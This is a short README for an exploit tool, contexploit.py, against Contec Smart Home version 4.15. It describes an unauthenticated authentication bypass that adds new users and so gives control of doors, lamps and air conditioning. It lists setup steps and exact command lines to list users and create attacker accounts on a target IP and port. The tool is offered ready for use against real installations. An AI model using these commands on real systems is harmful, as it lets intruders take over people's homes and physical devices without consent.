the Vulnerability allow unauthenticated attacker to remotely bypass authentication and added new user without confirming.
after Successfully added new users, the attacker can control anything (lamps, doors, air conditioner, etc)
Contec smart home Unauthorized Users Added
Affected version : 4.15
want to know more about Contec Smart Home system ?
http://contec.co.il/en/
require 2 modules (bs4, requests)
Root@Linux: ~# pip install -r requirement.txt
or
Root@Linux: ~# pip install bs4 requests
Work in both python 2.x and 3.x
Tested on Linux and MAC os
to view users list
Root@Linux: ~# python ./contexploit.py -t http://(ip):(port) --list-user
to added new user
Root@Linux: ~# python ./contexploit.py -t http://(ip):(port) -u (NewUser) -p (NewPassword)